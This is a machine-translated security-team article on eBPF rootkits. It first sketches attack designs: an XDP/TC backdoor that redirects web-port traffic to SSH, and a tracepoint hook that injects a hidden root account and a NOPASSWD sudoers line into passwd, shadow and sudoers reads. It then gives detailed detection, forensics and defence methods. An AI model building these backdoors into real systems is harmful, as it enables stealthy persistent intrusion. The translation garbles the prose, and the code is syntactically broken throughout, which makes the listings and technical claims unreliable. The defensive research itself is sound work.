Preface
In recent years, the cloud-native space has grown rapidly, and K8s has become a recognized cloud operating system. The high-frequency deployment of containers, short lifecycle, and complex network routing have brought new challenges to kernel security. The complexity faced by the system kernel is growing, and it is extremely difficult to meet the new demands of performance and scalability while still ensuring system stability and availability. At this time, eBPF appeared, which guarantees the stability of the system kernel with smaller subsystem changes, and also has the feature of real-time dynamic loading, which can load business logic into the kernel and realize the dynamic execution of hot updates.
eBPF was developed from BPF, BPF is known as Berkeley Packet Filter, which was proposed by Steven McCanne and Van Jacobson in 1992, and introduced into Linux Kernel 2.1 in 1997, with the addition of an on-the-fly compiler in 3.0, and applied in the field of network filtering. in 2014 Alexei Starovoitov implemented eBPF and extended it to the user space for even more power. The commonly used TCPDUMP & LIBPCAP are based on it. In Linux Kernel 4.x, event types such as kernel-state functions, user-state functions, tracepoints, performance events (perf_events), and security controls were extended. Especially in recent years, the rapid development of cloud native has also led to the prosperity of eBPF. Microsoft, Google, Facebook and other companies set up the eBPF Foundation, and Cilium released network products implemented based on eBPF technology. However, while eBPF technology drives the rapid development of new businesses, it also brings security threats.
analysis of current situation
We can see from some overseas information and domestic information that eBPF has been maliciously used by many illegal organizations and institutions while solving many technical difficulties.
Overseas Information
Black Hat
At Black Hat 2021, Datadog engineer Guillaume Fournier presented on the topic ofWith Friends Like eBPF, Who Needs Enemies?shares, he describes how eBPF can be maliciously exploited, including how to build a rootkit, how to exploit it, and puts detection defense code on theGitHub Up.
DEFCON
At DEF CON29, security researcher Pat Hogan also shared some cases of eBPF being maliciously exploited:Warping Reality - creating and countering the next generation of Linux rootkits using eBPF. , where the application scenarios of the eBFP rootkit are described, including network, runtime and other scenarios, as well as how to detect eBPF being maliciously exploited. The code is also placed in theGitHub Up.
Domestic information
Compared with foreign countries, there is less information about the malicious use of eBPF in China, and there is less sharing of related technology.It is possible that this aspect of the hazard has not yet received the attention of our domestic security counterparts, and if we continue to do so, it will inevitably affect the ability of domestic companies in thecyber securityThe construction of the defense system level, which in turn leads to security protection lagging behind foreign countries, bringing greater risks to corporate security and even national security. Meituan (Chinese company)information securityThe team, as the builder of the defense system, has the responsibility and obligation to lead a better understanding of this malicious exploitation, share Mission's experience in detecting and defending, and reinforce thecyber securityproducts, hoping to contribute to the construction of domestic information security.
Attack Principles for Malicious Exploitation of eBPF Technology
Know your enemy and know yourself, in order to fight a hundred battles, to do a good job of defense, you must understand the principle of its attack. Let's first look at how the eBPF rootkit is designed. In terms of eBPF's functionality, it offers the following areas of functionality:
- reticulation
- control
- observation (scientific etc)
- Tracking & Performance Analysis
- surety
existreticulationfield, cloud-native companies such as Cilium have made a lot of network-layer products that realize grid management while making corresponding network-level security policies, especially in the field of network orchestration, which has performed particularly well, gradually replacing theiptablesand other products that have a tendency to dominate the market. And in thecontrol,observation (scientific etc)There are also many products in areas such as. Especially in the field of Runtime Security (Runtime Security), Datadog, Falco, Google and other companies have also launched the corresponding products. If you are interested, you can refer to the product source code analysis (Cilium eBPF implementation mechanism source code analysis,Analysis of Datadog's eBPF security detection mechanism) of sharing.
We review the hook points of the eBPF technology:
As you can see from the figure, the hook point function of eBPF consists of the following parts:
- It can be between Storage, Network, etc. to interact with the kernel;
- It can also be between function module interactions in the kernel;
- Again, it can be between kernel-state and user-state interactions;
- More than that, it can be in userland process space.
The functions of eBPF cover XDP, TC, Probe, Socket, etc. Each function point enables kernel-state tampering behaviors, thus making the user state completely blind, even kernel-module-based HIDS, as well as unable to perceive these behaviors.
Based on the functional functions of eBPF, from the perspective of business scenarios, the functions of network, monitoring, and observation classes promote the development of products in the cloud-native field; the tracking/performance analysis and security functions accelerate the evolution of security defense and auditing products; and the malicious exploitation in the security field will also become thehackerDirection of Concern. In this article, we will discuss the new threats and defense ideas.
From the point of view of the stage of data flow, this paper is divided into two parts, followed by a discussion of malicious exploitation, risk hazards and defense ideas.
- Linux network layer malicious exploit
- Linux Runtime Malicious Exploitation
Linux network layer malicious exploit
Take a server with SSH and Web services as an example, in the common network access policy of IDC, the public Web 80 port is opened to allow IP access from any source. And SSH service only allows specific IP, or only open intranet port access.
Assuming that this server has been hacked and the hacker needs to leave a backdoor behind and needs a hidden, reliable network link to serve as the backdoor channel, how would this be accomplished with eBPF technology?
XDP/TC layer modifies TCP packets
In order to make the backdoor hide better, it is better not to open the process and not to listen to the port (in the current part, we only discuss the network layer hiding). The eBPF technology in the XDP, TC, Socket and other kernel layer functions, can realize the traffic information modification, these functions are often used in the L3, L4 network load balancing. For example, Cilium's network policies are all based on eBPF XDP implementation. eBPF hooks the XDP point, changes the destination IP of the TCP packet, and the system kernel then forwards the packet.
Following XDP and TC in the Linux kernel, the location of ingress and egress is handled to determine the hook point more accurately.
- The BPF_PROG_TYPE_XDP program type of XDP can drop, modify, and retransmit traffic from ingress, but cannot work on egress.
- TC's BPF_PROG_TYPE_SCHED_CLS can work on egress in addition to having the functionality of XDP "BPF_PROG_TYPE_XDP".
The most common scenario for the former is to do network firewalls for network traffic cleaning, which is much more efficient than traditional firewalls. The latter is commonly used in cloud native scenarios, containers, Pod network monitoring, security access control and so on. In this example, both incoming and outgoing traffic should be adjusted, so both hook points need to be available. Similarly, in the XDP and other phases of the hook, where the relevant packet logic is handled, the communication packets can be better hidden, tcpdump and other tools can not be caught.
control link
In the backdoor scenario, you can change the target port from 80 in Web Nginx to 22 in SSHD in the same location, like eBPF's load balancing, and you can achieve network data passthrough, bypassing firewalls as well as network access restrictions.
authentication key
Since the backdoor rootkit works at the XDPTC layer, in order to keep things as simple as possible, it is best to use only link layer, network layer, and transport layer data for the authentication key, i.e., MAC information, IP quintet, and the like. the IP changes frequently, and the MAC address is probable to be unique, as well as to set a fixed port, which is even more unique, and which can be realized as an authentication key for the rootkit (it is necessary to Client to specify the client's TCP port when the Client initiates the connection).
eBPF uprobe linked to eBPF map
For backdoor rootkit key update, it is also good to utilize eBPF. For example, in the Nginx scenario, uprobe implements the function of hook HTTP to get a specific string in the URL parameter, and then saves the string into the eBPF map, which realizes the key update.
The eBPF rootkit execution at the XDP/TC layer reads the key in the eBPF map and performs a comparison operation.
Realization process
Here's an example of how XDP handles ingress:
SEC ("xdp/ingress")
int xdp_ingress(struct xdp_md *ctx) {
struct cursor c.
struct pkt_ctx_t pkt.
// Determine whether the protocol is SSHD, if not, then directly released
if (! (not SSHD protocol(&c))) {
return XDP_PASS.
}
// Determine if the rootkit matches and if the NIC information matches the source port
hack_mac[] = "Reading bpf map configuration."
if(key mismatch) {
return XDP_PASS.
}
// Read the map to see if the client already exists.
struct netinfo client_key = {};
__builtin_memcpy(&client_key.mac, &pkt.eth->h_source, ETH_ALEN);
struct netinfo *client_value;
client_value = bpf_map_lookup_elem(&ingress_client, &client_key);
// If you don't find a disguise, assemble it yourself
if(!client_value) {
__builtin_memset(&client_value, 0, sizeof(client_value));
} else {
bpf_map_update_elem(&ingress_client, &client_key, &client_value, BPF_ANY);
}
// Disguise mac LAN mac information
pkt.eth->h_source[0] = 0x00;
...
// Replace the ip source of the masquerade, leaving the client port unchanged.
// Change the destination port
pkt.tcp->dest = htons(FACK_PORT); //22
// Calculate TCP SUM layer 4
ipv4_csum(pkt.tcp, sizeof(struct tcphdr), &csum);
pkt.tcp->check = csum;
// Write the disguised map for TC to handle the original mac, IP information restoration of egress.
return XDP_PASS.
}
A relatively simple demo can be implemented to disguise TCP packets on the egress side. Similarly, when the TC layer handles packets in the egress direction, it only needs to make a reduction of the original information of the disguised packet. The whole process is shown in the following figure:
In this way, the rootkit's communication link does not affect normal user access, and no changes are made to the original system, making it particularly well hidden.
Video Demonstration
We prepared three hosts for testing:
- Intruder: cnxct-mt2 with IP 172.16.71.1.
- Regular user: ubuntu with IP 172.16.71.3.
- Compromised server: vm-ubuntu, IP 172.16.71.4. open nginx web port 80; open SSHD port 22, and set iptables rule to allow only intranet IP access.
jeopardize
This rootkit does not actively create sockets and borrows one of the network sending packets to deliver the message to the backdoor user. It's just a small, insignificant network response to the system impact. It can't be located at all in the thousands of HTTP packets.
- iptables firewall bypass: Utilize port 80, which is open to the public, as a communication tunnel;
- WebIDS bypass: Traffic arrives at the server and is not passed to Nginx;
- NIDS bypass: There is nothing unusual about intruder traffic flowing between LANs, it just can't be decrypted;
- HIDS bypass: Is the firewall trusted to ignore SSHD logins from local/LAN sources.
Linux Runtime Malicious Exploitation
Under the cloud-native ecosystem, a large number of cluster network management plug-ins based on eBPF technology implementations have emerged, such as Calico, Cilium, and so on. The business-implemented network management services are deployed in a containerized manner, and there is a need to enable SYS_BPF_ADMIN privileges for these containers to support eBPF system calls. The environment in which these services run also leaves a perfect space for attackers to play.
Realization process
Recall that eBPF's hook point, kprobe, tracepoint event type in syscall, if used in a backdoor rootkit scenario, is very scary. For example, modify the kernel state to return to the user state data, intercept and block the user state behavior, etc., do whatever you want. What's even more scary is that common HIDS is based on kernel state or user state to do behavioral monitoring, eBPF precisely bypassed most of the HIDS monitoring, and does not generate any logs, simply let people "think extremely fearful, shudder".
tracepoint event type hook
In an SSHD application, files such as /etc/passwd are read when a user logs in. The user-state SSHD program, calls system calls such as open, read, etc., to allow the kernel to go to the hardware disk to retrieve the data and return it to the SSHD process.
Userland generates a payload
The user state implements the generation of payloads for files such as /etc/passwd, /etc/shadow, etc., and completes the replacement of field values for ELF .rodata through eBPF's RewriteConstants mechanism.
import "github.com/ehids/ebpfmanager"
// Passing data via elf's constant substitution
func (e *MBPFContainerEscape) constantEditor() []manager.ConstantEditor {
var username = RandString(9)
var password = RandString(9)
var s = RandString(8)
salt := []byte(fmt.Sprintf("$6$%s", s))
// use salt to hash user-supplied password
c := sha512_crypt.New()
hash, err := c.Generate([])byte(password), salt)
var m = map[string]interface{}{}
res := make([]byte, PAYLOAD_LEN)
var payload = fmt.Sprintf("%s ALL=(ALL:ALL) NOPASSWD:ALL #", username)
copy(res, payload)
m["payload"] = res
m["payload_len"] = uint32(len(payload))
// Generate passwd string
var payload_passwd = fmt.Sprintf("%s:x:0:0:root:/root:/bin/bashn", username)
// Generate a shadow string
var payload_shadow = fmt.Sprintf("%s:%s:18982:0:99999:7:::n", username, hash)
// eBPF RewriteContants
var editor = []manager.ConstantEditor{
{
Name. "payload",
Value: m["payload"],
FailOnMissing. true,
},
{
Name. "payload_len",
Value: m["payload_len"],
FailOnMissing. true,
},
}
return editor
}
func (this *MBPFContainerEscape) setupManagers() {
this.bpfManager = &manager.Manager{
Probes: []*manager.Probe{
{
Section. "tracepoint/syscalls/sys_enter_openat",
EbpfFuncName. "handle_openat_enter",
AttachToFuncName. "sys_enter_openat",
}
...
},
Maps: []*manager.Map{
{
Name. "events",
},
},
}
this.bpfManagerOptions = manager.Options{
...
// Fill in the map corresponding to RewriteContants.
ConstantEditors: this.constantEditor(),
}
}
Kernel state using payload
const volatile int payload_len = 0;
...
const volatile char (computing) payload_shadow[MAX_PAYLOAD_LEN].
SEC("tracepoint/syscalls/sys_exit_read")
int handle_read_exit(struct trace_event_raw_sys_exit *ctx)
{
// Determine if the behavior is rootkit and if the payload needs to be loaded.
...
long int read_size = ctx->ret;
// Determine if the length of the original buff is less than the payload.
if (read_size < payload_len) {
return 0;
}
// Determine the file type and append the appropriate payload if it matches.
switch (pbuff_addr->file_type)
{
case FILE_TYPE_PASSWD.
// Overwrite the payload to the buf, use the original buff for any shortfalls.
{
bpf_probe_read(&local_buff, MAX_PAYLOAD_LEN, (void*)buff_addr).
for (unsigned int i = 0; i < MAX_PAYLOAD_LEN; i++) {
if (i >= payload_passwd_len) {
local_buff[i] = ' ';
}
else {
local_buff[i] = payload_passwd[i];
}
}
}
break;
case FILE_TYPE_SHADOW.
// Overwrite the shadow file
...
break;
case FILE_TYPE_SUDOERS.
//overwrite sudoers
...
break;
default:
return 0;
break;
}
// Write payload memory to buffer
ret = bpf_probe_write_user((void*)buff_addr, local_buff, MAX_PAYLOAD_LEN).
// Send events to userland
return 0;
}
According to the design of the above Demo rootkit, the addition of root accounts with random usernames and passwords is completed. In terms of authentication, it can also be used with the "eBPF network layer malicious use" demo, using the eBPF map interaction to achieve the corresponding authentication. However, the rootkit itself does not change the files on the hard disk and does not generate risky behavior. Moreover, the rootkit only covers specific processes, which makes it more stealthy. The whole process is shown in the figure below:
It works the same whether it's on a physical machine or a container given root+BPF permissions.
critical danger
In cloud-native scenarios, there are many container scenarios that give SYS_ADMIN privileges, and with the recent "Java log4j" vulnerability, it is possible to directly penetrate the container and get the host privileges, isn't it scary?
However, it's scarier than that:This rootkit itself does not generate logs of user-state behavior, nor does it change files, and no information about this user can be found in the system. The entire backdoor behavior does not generate data, disabling most HIDS.
summarize
From the demonstration of the two scenarios in this article can be seen, I believe that we already know the eBPF technology is malicious use of the harm. In fact, this is only the eBPF technology is malicious interests of the "tip of the iceberg", in the kproebuprobe also has a lot of functions, such as the realization of the process of hiding, no trace of intranet scanning and so on. For more related malicious exploits, please refer toBad BPF - Warping reality using eBPFAn article.
If the intruder carefully designed rootkit, realize the process of hiding, etc., so that the rootkit more hidden, according to the ideas in this article, to achieve a "ghost-like" backdoor, think about it let a person be afraid.
Conventional host security defense products generally use Netlink, Linux Kernel Module and other technologies to achieve process creation, network communication and other behavioral awareness, while the eBPF hook point can be deeper than these technologies, earlier than their implementation, meaning that the conventional HIDS does not sense the discovery of them.
Traditional rootkit, using hook api method, replace the original function, resulting in the implementation of the function call address changes, there are mature detection mechanisms, eBPF hook is different from the traditional rootkit, function call stack unchanged. This brings a lot of trouble to the detection.
So how do we detect and defend against such backdoors?
Detection and defense
In terms of the course of events, there are three stages:
- pre-operational
- runtime
- after a run
pre-operational
The idea of reducing the attack surface before the malicious program runs is constant.
Environmental constraints
Whether it is the host or the container, the permissions are converged, and if you can not give SYS_ADMIN, CAP_BPF and other permissions, then disable them. If you must open this permission, then it can only be put into the runtime detection session.
seccomp restrictions
At container startup, modify the default seccomp.json to disable bpf system calls to prevent container escape, note that this method does not work for Privileged privileged containers.
Kernel compilation parameter restrictions
When modifying the return value of a function to do runtime protection, you need to use bpf_override_return, which requires the kernel to turn on the CONFIG_BPF_KPROBE_OVERRIDE compilation parameter, so don't turn on this compilation parameter unless under special circumstances.
unprivileged user instruction
Most eBPF program types require a user with root privileges to call them for execution. There are a few exceptions, such as BPF_PROG_TYPE_SOCKET_FILTER and BPF_PROG_TYPE_CGROUP_SKB, which don't require root, but do require reading the system configuration switches.
//https://elixir.bootlin.com/linux/v5.16.9/source/kernel/bpf/syscall.c#L2240
if (type ! = BPF_PROG_TYPE_SOCKET_FILTER &&
BPF_PROG_TYPE_SOCKET_FILTER && type ! = BPF_PROG_TYPE_CGROUP_SKB &&
!bpf_capable())
return -EPERM.
Switch Confirmation
In /proc/sys/kernel/unprivileged_bpf_disabled, this can be done by executing thesysctl kernel.unprivileged_bpf_disabled=1
to modify the configuration. Configuration meanings are given inDocumentation for /proc/sys/kernel/.
- A value of 0 indicates that unprivileged users are allowed to invoke bpf;
- A value of 1 prohibits unprivileged users from invoking bpf and the value cannot be changed, only after a reboot;
- A value of 2 means that non-privileged users are prohibited from invoking bpf, which can be modified again to 0 or 1.
Characterization
It has been proposed to perform signature verification when the kernel loads BPF bytecode in order to reach the point where only securely signed BPF bytecode is loaded. This topic is also listed in lwn.net:BPF Bytecode Signature Scheme.
But many people also suggestobjectionThey think that the BPF module has been too abstract and complicated in the past few years, so they don't want to add extra features to make BPF more unstable. Instead, they changed their mindset to allow byte code to be signed when it is loaded, to "execute the BPF byte code loaded by the user program to sign", which is an existing kernel feature, and will not increase the complexity of the system.
This article argues that this does alleviate most of the BPF bytecode loading problems. However, using the system native commands (tcipbpftool
etc.) still face threats if they are loaded. For example:ip link set dev ens33 xdp obj xdp-example_pass.o
.
Operational checks
Most eBPF programs don't exist anymore after reboot, so intruders will try to make the backdoor self-start as much as possible. Do a good check for Linux system's self-boot, crontab and other scheduled tasks.
User-state programs can exist in various forms, ELF executables, ELF so dynamic link libraries can be. When executing, BPF syscall must be called to load BPF bytecode. It is not accurate enough to do the detection only for executable ELF.
runtime
control
All programs running on a Linux system must make a system call, and the eBPF program is no exception. The SYS_BPF instruction with a syscall of 321 needs to be called. And, all eBPF program execution, map creation must make this syscall call. Then, it is the best program to intercept and monitor in this necessary path.
SEC ("tracepoint/syscalls/sys_enter_bpf")
int tracepoint_sys_enter_bpf(struct syscall_bpf_args *args) {
struct bpf_context_t *bpf_context = make_event();
if (!bpf_context)
return 0;
bpf_context->cmd = args->cmd;
get_common_proc(&bpf_context->procinfo) ;
send_event(args, bpf_context) ;
return 0;
}
Here, our open source ehids project made a BPF syscall detection example, you can Fork to understand. The warehouse address is:GitHub/ehids.
The careful reader may wonder at this point what if the intruder's backdoor executes earlier and spoofs this system call. This is a very good question, which we will put into the post-run traceability chapter for discussion. But for most scenarios, HIDS defense products can still be the first time to start.
Audit & Screening
Above we discussed monitoring the invocation of BPF system. In cloud-native scenarios, network products implemented based on eBPF will be frequently invoked, which will generate a large number of event logs, thus bringing more pressure to operation students. Then, doing streamlining and precise screening of behaviors becomes our next goal.
Screening based on program whitelisting
Data filtering, a solution to the pressure of large amounts of data. On some business servers of BPF applications, the business behavior itself will generate a large number of calls, which will bring more auditing pressure to the security warning. For known processes, we can filter based on process characteristics.
Get the current process pid, comm and other attributes, and decide whether to report or not, or whether to intercept according to the configuration of eBPF map written in user state. You can also do filtering in the user state, but the kernel state is more efficient. If you are doing interception, it has to be implemented in kernel state.
You can refer tosaBPF product design ideas , the hook program that implements the LSM hook point with eBPF, completes the associated audit call. AlthoughGitHub/saBPF-project The project code is still just a demo, but the ideas can be borrowed.
Filter by SYSCALL type
In BPF syscall, the subcommand functions include map, prog, and many other types of operations.bpf() subcommand reference In real business scenarios, the security risk of "write" operations is higher than "read" operations, so we can filter out "read" operations and only report and audit "write" operations. Therefore, we can filter out "read" operations and only report and audit "write" operations.
For example:
- MAP creation BPF_MAP_CREATE
- PROG load BPF_PROG_LOAD
- BPF_OBJ_PIN
- BPF_PROG_ATTACH
- BPF_BTF_LOAD
- BPF_MAP_UPDATE_BATCH
Especially business scenarios with BPF requirements allow for better auditing of logs.
after a run
A few questions here. eBPF userland program interacts with kernelland program, can it exit after loading BPF bytecode? After exiting, does the kernel hook BPF function still work? Does the created map still exist? How do we choose a backdoor program to ensure better stealth?
If we want to answer these questions, we have to mention the loading mechanism of the BPF program, the BPF object life cycle.
File Descriptors and Reference Counters
The user-state program accesses BPF objects (progs, maps, debugging information) via file descriptor FDs, each of which has a reference counter. If the user state opens and reads the corresponding FD, the corresponding counter is increased. If the FD is closed, the reference counter decreases, and when refcnt is 0, the kernel will release the BPF object, then this BPF object will no longer work.
In a security scenario, if a user-state backdoor process exits, the backdoor eBPF program exits with it. This can be a favorable feature when doing security checks to see if the process list contains suspicious processes.
However, not all BPF objects exit with the exit of the userland process. From the kernel principle, it is only necessary to ensure that refcnt is greater than 0 to keep the BPF object alive and keep the backdoor process working. In fact, among the BPF program types, hooks like XDP, TC, and CGROUP-based hooks are global and do not exit with the exit of the user-state process. The corresponding FD will be maintained by the kernel to ensure that the refcnt counter is not zero and thus continues to work.
investigate the origin of sth.
Security engineers often need to make different traceability strategies according to different scenarios. The traceability methods given in this paper all use the relevant interfaces of eBPF, which means:If the malicious program was run earlier than the checking tool, then there is a possibility of falsification for the result.
short life cycle
BPF program type representation
- k[ret]probe
- u[ret]probe
- tracepoint
- raw_tracepoint
- perf_event
- socket filters
- so_reuseport
Characterized by FD-based management, the kernel is automatically cleaned up, which is better for system stability. This program type of backdoor is clearly characterized as a user-state process during troubleshooting. And it can be obtained from the list of BPF programs running on the system.
bpftool tool
List of eBPF programs
commandbpftool prog show
as well asbpftool prog help
See more parameters.
In the result, you can see the BPF program currently running on the system, the associated BPF map ID, and the corresponding process information. In addition, careful readers may find that in the result, there is no process ID information in the XDP data, which will be discussed later.
eBPF map list
commandbpftool map show
as well asbpftool map help
More parameters can be viewed.
By viewing the map information, it can be corrected with the program information. Moreover, the data in the map can be exported to identify malicious process behavior. This is discussed in the "Forensics" section.
bpflist-bpfcc
bpflist-bpfcc -vv
command to see a list of "some" BPF programs currently running on the server. Let's take a test environment as an example:
root@vmubuntu:/home/cfc4n/project/xdp## bpflist-bpfcc -vv
open kprobes.
open uprobes.
PID COMM TYPE COUNT
1 systemd prog 8
10444 ehids map 4
10444 ehids prog 5
You can see that the system process systemd starts 8 prog programs. ehids process creates 4 eBPF maps with 5 progs. but in fact the preceding also executes theip link set dev ens33 xdp obj xdp-example_pass.o
command, which is not shown here. It means that the output of this command is not the case for all bpf programs, map.
long life cycle
BPF program type representation
- XDP
- TC
- LWT
- CGROUP
Above mentioned scenarios of loading BPF bytecode with ip command, it is common that the BPF tool can't query it or the information is missing. The reason behind this needs to be told from its working principle.
The ip command loads the BPF principle
The life cycle of BPF objects is managed using a reference timer, a general principle that all BPF objects need to follow. While the long life cycle program type starts FD is the user control program passing parameters to the kernel space, which is then maintained by the kernel space.
With the previously mentioned IP commandip link set dev ens33 xdp obj xdp-example_pass.o
For example, the parameter of the ip command contains the name of the bpf bytecode file, the ip process opens the FD of the .o bytecode, sends a message of type IFLA_XDP (subtype IFLA_XDP_FD) to the kernel through NETLINK, the kernel calls the dev_change_xdp_fd function, and the NIC takes over the FD, and the reference counter is incremented. exits and the BPF program still works. For kernel source code see:elixir.bootlin.com/linux.
In this article, we have done packet grabbing to verify that the ip program associates with the XDP program type:
17:53:22.553708 sendmsg(3, {
{
msg_name={sa_family=AF_NETLINK, nl_pid=0, nl_groups=00000000}, {
msg_name={sa_family=AF_NETLINK, nl_pid=0, nl_groups=00000000}, msg_namelen=12,
msg_iov=[
{
iov_base={
{nlmsg_len=52, nlmsg_type=RTM_NEWLINK, nlmsg_flags=NLM_F_REQUEST|NLM_F_ACK, nlmsg_seq=1642672403, nlmsg_pid=0}, { nl_family=NLM_F_REQUEST|NLM_F_ACK, nlmsg_seq=1642672403, nlmsg_pid=0}, { iov_base={
{ifi_family=AF_UNSPEC, ifi_type=ARPHRD_NETROM, ifi_index=if_nametoindex("ens33"), ifi_flags=0, ifi_change=0},
{
{nla_len=20, nla_type=IFLA_XDP}, {
[
{{nla_len=8, nla_type=IFLA_XDP_FD}, 6}, {{nla_len=8, nla_type=IFLA_XDP_FD}, [
{{nla_len=8, nla_type=IFLA_XDP_FLAGS}, XDP_FLAGS_UPDATE_IF_NOEXIST}
]
}
},
iov_len=52
}
],
msg_iovlen=1,
msg_controllen=0,
msg_flags=0
}, 0) = 52
You can see that the FD parameter after IFLA_XDP_FD is 6. Similarly, deleting the XDP program requires setting FD to -1, which corresponds to the following NETLINK package composition:
17:55:16.306843 sendmsg(3, {
{
...
{nla_len=20, nla_type=IFLA_XDP}, { ...
[
{{nla_len=8, nla_type=IFLA_XDP_FD}, -1}, {{nla_len=8, nla_type=IFLA_XDP_FD}, {}
{{nla_len=8, nla_type=IFLA_XDP_FLAGS}, XDP_FLAGS_UPDATE_IF_NOEXIST}
] }
...
}, 0) = 52
More than just the ip command.TC Command Classifier Also supports BPF programs, loading BPF programs as classifiers and act ions to ingress/egress hook points. The principle behind this is similar to IP, also the NetLink protocol communicates with the kernel and the network card maintains the BPF object counters.
Detection mechanism
Use the native ip, tc, and other commands to view the BPF objects loaded by the NIC
ip link show
tc filter show dev [NIC name] [ingress|egress]
Use the bpftool command to view the
bpftool net show dev ens33 -p
command can be used to view network-related eBPF hook points.
The loading of BPF_PROG_TYPE_CGROUP_SKB and BPF_PROG_TYPE_CGROUP_SOCK type programs for CGROUP can be viewed with the bpftool prog show. The difference between long and short life cycle BPF programs is the lack of user space process PID information. This is shown in the following figure:
BPFFS
In addition to the previously mentioned methodsBPF file systemBPFFS is also a way to keep BPF programs running in the background. A user-space process can PIN a BPF program to BPFFS using any name it wants, and keep it active in the background by letting BPFFS automatically increment the BPF object's refcnt reference counter. In use, just use bpf_obj_get("BPFFS path") to get the FD of the BPF object.
The type of BPFFS in Linux is BPF_FS_MAGIC, the default directory /sys/fs/bpf/ can be customized and modified, but make sure that the file system type is unix.BPF_FS_MAGIC.
In terms of detection ideas, we need to focus on whether the virtual file system is of type unix.BPF_FS_MAGIC.
On Linux systems, themount -t bpf
to see all the file types that the system hangs on and whether they contain the BPFFS type.
After determining the directory for BPFFS, we then look at the mount points in the directory for any anomalies.
forensics
Kernel-loaded BPF object exports
The bpftool tool can export prog, map with FD id.
BPF prog program
You can export opcodevisuallinum and other formats, and can generate call relationship diagram. Specifically, you can check the help file of bpftool.
root@vmubuntu:/home/cfc4n# bpftool prog help
bpftool prog dump xlated PROG [{ file FILE | opcodes | visual | linum }]
bpftool prog dump jited PROG [{ file FILE | opcodes | visual | linum }]
BPF map
Similar to prog, content can be exported via bpftool and JSON formatted content is supported.
root@vmubuntu:/home/cfc4n# bpftool map dump id 20
[{
"value": {
".rodata": [{
"target_ppid": 0
},{
"uid": 0
},{
"payload_len": 38
...
BPFFS
BPFFS type BPF object, although it can be more convenient to put into the background execution, user space program can exit, but also can be read again, but this also brings a great convenience to the forensics. bpftool command also supports from pinned to the BPFFS file system in the path of the export prog, map. parameters are slightly different, for details, see bpftool help.
BPF objects not loaded by the kernel
When the user space program of the backdoor rootkit is located, then the BPF bytecode will definitely be called by it. The bytecode content is usually placed in a separate file or compiled into the current program as bytecode. This is also just a matter of using a decompiler tool like IDA to locate the relevant byte stream and export it.
As an example, the ehids process in the demo video in this article uses theGitHub/ehids/ebpfmanager Pure Go eBPF module manager package, for eBPF bytecode will use github.com/shuLhan/go-bindata/cmd/go-bindata package for BPF bytecode to load, Gzip compression, as a variable of the Go code, in the deployment of the more boundary.
When IDA Pro is loaded, we can see this piece of code in the .noptrdata segment part, the start address is 0000000000827AE0, after exporting and then unpacking, you can restore the original BPF ELF file content.
Because each BPF user-state implementation is different, the class library is also different, static analysis is difficult to practice. Then you can simulate the same environment, run dynamically, hook BPF syscall in advance, find the place where FD is set up, and also you can export the ELF file of BPF.
bytecode analysis
BPF byte code itself is also ELF format, just format instructions have some differences. Decompiler tool IDA pro can also support, foreign security engineers open source a Python plug-in:eBPF IDA Proc , and put together an article analyzing it:Reverse Engineering Ebpfkit Rootkit With BlackBerry's Enhanced IDA Processor Tool , interested students can read it.
How to defend
The use of eBPF in network security scenarios, in addition to doing intrusion detection, can also be used for defense.LSM PROBE hook provides related functions. Container escape scenarios, for example, the behavior of the most obvious feature is the "parent-child process" Namespace inconsistency, the child process creation is complete, determine whether this feature matches, return EPERM to cover the return value of the process creation function, so as to play the purpose of defense. Compared with the kernel module and other defense implementations, eBPF implementation is more secure, stable and reliable, thus solving the problem of container escape at the source.
Similarly, this paper argues that eBPF is the best virtual patching, hot update solution for the binary layer.
LSM_PROBE(bpf. int cmd. union bpf_attr *attr, unsigned int size)
{
return -EPERM.
}
There are certain requirements on the configuration of the system, CONFIG_BPF_LSM=y, CONFIG_LSM and other configuration content, must include bpf, etc. For details, please refer toBCC Class Library Demo lsm probe .
Engineering Realization
practice
For starter practice, try using BCC's class libraries:GitHub/BCC and various demo examples of user-space programs in C.Demo BPF applications .
Class library selection
Engineering, the quality of the project, stability, R & D efficiency requirements, we recommend Cilium's pure Go eBPF library, the official endorsement by the Cilium can be assured that the use of Datadog's Agent products are also using this library.
The product in this paper also refers to Datadog and abstractly wraps Cilium's eBPF library to achieve configurable and convenient management of eBPF programs. GitHub repository:ehids/ebpfmanager , which you are welcome to use.
Of course, it can also be implemented using libbpf-wrapped Go class libraries, such as products like Tracee.
System compatibility CO-RE
The emergence of eBPF has greatly simplified the threshold of writing kernel state code, and eBPF is highly sought after for its high security, friendly loading method, and efficient data interaction. However, like writing traditional kernel modules, the development of kernel state functions is accompanied by tedious adaptation testing work, and the many kernel versions of Linux make adaptation even more difficult, which is why bcc + clang + llvm was criticized by people for a long time before the emergence of BTF. Programs are compiled when they run, and the target machine has to install clang llvm kernel-header and other compilation environments, and compilation also consumes a lot of CPU resources, which is unacceptable on some high-load machines.
Therefore, BTF&CO-RE appeared out of nowhere, BTF can be understood as a Debug symbols to describe the way, before the traditional way Debug information will be very huge, the Linux kernel will generally turn off the Debug symbols, the emergence of BTF to solve the problem, significantly reduce the size of the Debug information, so that production scenarios kernel to carry the Debug information has become possible.
Happily, through the use of BTF&CO-RE this technology can help developers save a lot of adaptation efforts, but this technology is still under development, there are still many scenarios that can not be dealt with, such as the structure members are moved into the substructure, which still need to be manually solve the problem, the developers of the BTF have also written an article explaining different scenarios of the handling of the programbpf-core-reference-guide.
Large-scale projects
Overseas, the cloud-native field of products is developing faster, and a number of eBPF-based products have emerged, including Cilium,Datadog , Falco, Katran, etc., applied in various fields such as network orchestration, network firewall, tracking and positioning, runtime security, etc. You can learn from the R&D experience of these large-scale projects to accelerate product construction, including multi-system compatibility, framework design, project quality, monitoring system construction, etc.. This article focuses on detection and defense, and we will share the experience related to engineering and construction in future articles.
summarize
With the rapid development of cloud native, eBPF implementation software and running environment will become more and more popular. And the malicious utilization of eBPF will become more and more common. Judging from the situation at home and abroad, foreign research on this direction is far ahead of domestic.Once again, we urge everyone that network security products should be equipped with eBPF-related threat detection capabilities as soon as possible..
In this article, we discussed with you the malicious use and detection mechanism based on eBPF technology, which mentioned eBPF in defense detection product development, engineering construction and other content, we will share with you in the next article, please look forward to it.
Author's Profile
Chen Chi, Yang Yi, and Xin Bo, all from Meituan Information Security.
bibliography
- Creating and Countering the Next Generation of Linux Rootkits
- DEFCON 29 - eBPF, I thought we were friends
- eBPF's various technical applications PDF collection
- Offensive BPF: Malicious bpftrace
- Bad BPF - Warping reality using eBPF
- Lifetime of BPF objects
- BPF Program (BPF Prog) Type Explained: Usage Scenarios, Function Signatures, Execution Locations, and Program Examples
- Features of bpftool: the thread of tips and examples to work with eBPF objects
